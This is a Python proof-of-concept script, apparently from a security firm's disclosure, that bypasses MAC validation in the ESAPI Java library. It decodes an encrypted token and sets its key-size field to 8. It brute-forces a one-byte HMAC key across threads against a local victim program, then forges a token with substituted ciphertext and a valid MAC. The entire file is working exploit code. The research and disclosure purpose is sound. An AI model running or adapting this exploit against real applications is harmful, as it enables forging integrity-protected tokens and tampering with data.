#!/usr/bin/env python
# Synacktiv
# Proof-of-concept to bypass MAC validation in ESAPI library

from sys import exit, argv
from argparse import ArgumentParser
from threading import Thread
import hmac
import hashlib
import popen2

def main():
	p = ArgumentParser()
	p.add_argument('token', action='store', help='Token')
	p.add_argument('-t', '--threads', action='store',  metavar="NUMBER", default=20, help='Threads')

	o = p.parse_args()
	bf = HMACBruteforcer(nb_threads=o.threads)
	bf.bypass(o.token)

def callapp(token):
	cmd = "CLASSPATH=.:./lib/commons-fileupload-1.2.1.jar:./lib/esapi-2.1.1-SNAPSHOT.jar:./lib/commons-lang-2.5.jar:./lib/servlet-api-2.3.jar"
	cmd = cmd + (" java EsapiVictim d %s" % token)
	(child_stdout, child_stdin, child_stderr) = popen2.popen3(cmd, 1024, 'r')
	return child_stdout.read(), child_stderr.read()
	
	
class HMACBruteforcer():

	def __init__(self, nb_threads=20):
		self._nb_threads = nb_threads 

	# compute a HMAC SHA1
	def computehmac(self, key, iv, ciphertext):
		h = hmac.new(key, digestmod=hashlib.sha1)
		h.update(iv)
		h.update(ciphertext)
		m = h.digest()
		return m
	
	# main function trying to bypass the MAC validaiton
	def bypass(self, token):
		# find the 1-byte key
		key = self.bruteforce(token)
		if not key:
			print "no key found..."
			return

		# decode the input token
		(prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac) = self.decode(token)

		# tamper cipher text (in hex)
		ciphertext="deadbeefdeadbeef"
		ciphertextlen = len(ciphertext)

		# compute valid hmac using the 1-byte key
		mac = self.computehmac(key, iv, ciphertext)

		# tamper key size
		keysize = 8

		# encode the tampered token
		new_token = self.encode(prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac)

		# call app with the tampered token and check if we bypassed the MAC validation
		out, err = callapp(new_token)

		print "=========== STDOUT ============"
		print out
		print "=========== STDERR ============"
		print err

	# key bruteforcer
	def bruteforce(self, token):
		goodkey = ""
		char_list = []
		slaves = []
			
		# multi-threading management
		nb_threads = self._nb_threads
		for key in range(0, 256, nb_threads):
			# bruteforce the 1-byte key from 0 to 255

			# managing the final loop
			if (256-key) < nb_threads:
				nb_threads = 256-key
	
			# run several threads calling the victim application
			for t in range(0, nb_threads):
				slave = Thread(target=HMACBruteforcer.bf_thread, args=(self, token, key+t, char_list))
				slave.start()	
				slaves.append(slave)
	
			for slave in slaves: slave.join()
			slaves = []
			
			# check if the key was found.	
			if char_list:
				goodkey = char_list[0]
				print "HMAC 1-byte key found: %s" % goodkey
				break

		return goodkey.decode("hex")

	# thread used to call the external victim application
	def bf_thread(self, token, key, char_list):
		# decode token to get iv and ciphertext
		(prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac) = self.decode(token)

		# compute a hmac using the current key + tamper the keysize
		mac = self.computehmac(('%02x' % key).decode("hex"), iv, ciphertext)
		keysize = 8

		# call the victim
		out, err = callapp(self.encode(prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac))

		# check if we bypassed the HMAC validation
		if out.find("Expiration ->") >= 0:
			char_list.append(('%02x' % key))
	
	# token decoder
	def decode(self, token):
		token = token.decode("hex").decode("base64")
		offset = 0
		prf = token[offset:offset+4]
		offset += 4
		timestamp = token[offset:offset+8]
		offset += 8
		cipherlen = int(token[offset:offset+2].encode("hex"), 16)
		offset += 2
		cipher = token[offset:offset+cipherlen]
		offset += cipherlen
		keysize = int(token[offset:offset+2].encode("hex"), 16)
		offset += 2
		blocksize = int(token[offset:offset+2].encode("hex"), 16)
		offset += 2
		ivlen = int(token[offset:offset+2].encode("hex"), 16)
		offset += 2
		iv = token[offset:offset+(ivlen)]
		offset += ivlen
		ciphertextlen = int(token[offset:offset+4].encode("hex"), 16)
		offset += 4
		ciphertext = token[offset:offset+(ciphertextlen)]
		offset += ciphertextlen
	
		# check if mac exists
		maclen = 0
		mac = ""
		if len(token) > offset:
			maclen = int(token[offset:offset+2].encode("hex"), 16)
			offset += 2
			mac = token[offset:offset+(maclen)]
		
		return (prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac)
	
	
	# token encoder
	def encode(self, prf, timestamp, cipherlen, cipher, keysize, blocksize, ivlen, iv, ciphertextlen, ciphertext, maclen, mac):
		token = prf
		token = token + timestamp
		token = token + ('%04X' % cipherlen).decode("hex") 
		token = token + cipher
		token = token + ('%04X' % keysize).decode("hex") 
		token = token + ('%04X' % blocksize).decode("hex") 
		token = token + ('%04X' % ivlen).decode("hex") 
		token = token + iv 
		token = token + ('%08X' % ciphertextlen).decode("hex") 
		token = token + ciphertext 
		token = token + ('%04X' % maclen).decode("hex")
		token = token + mac
		return token.encode("base64").replace("\n", '').encode("hex")


if __name__ == '__main__':
	main()


